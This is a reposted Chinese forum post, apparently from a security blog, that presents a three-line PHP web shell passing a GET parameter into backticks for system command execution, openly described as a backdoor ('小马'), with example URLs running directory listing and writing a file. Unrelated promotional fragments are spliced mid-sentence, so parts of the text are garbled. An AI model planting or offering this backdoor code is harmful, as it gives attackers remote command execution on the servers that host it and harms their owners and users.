日期:2014-05-17  浏览次数:20557 次

<转载>一个官方没有公布的php秘籍,可用作后门

可以看看

http://www.webshell.cc/3303.html

好奇怪的漏洞?

可以当做个小马使用,比较有意思的一个东西

写道
被过滤广告
发现这个也是巧合,我就直接说了吧

<?php
//t.php
$test = $_GET['r'];
echo `$test`;
?>大家看看这个代码有木有问题?

这里是我们自己的交流平台,是属于我们90sec所有成员的技术分享平台! 我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,

信息安全团队 而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键 感叹号!旁边的,

专注信息安全通过 echo `系统命令`; 可以达到 system(); 一样的效果

如果不信的朋友可以测试

http://webshell.cc/t.php?r=dir

可以列出目录

http://webshell.cc/t.php?r=echo

我是马儿 D:\web\webshell.cc.php

大家觉得我没有忽悠 就赏点分哈


文章来自: WebShell'S Blog 本文地址:http://www.webshell.cc/3303.html

?

?

?

1 楼 hoodbc 2012-09-13  
shell_exec 没有禁用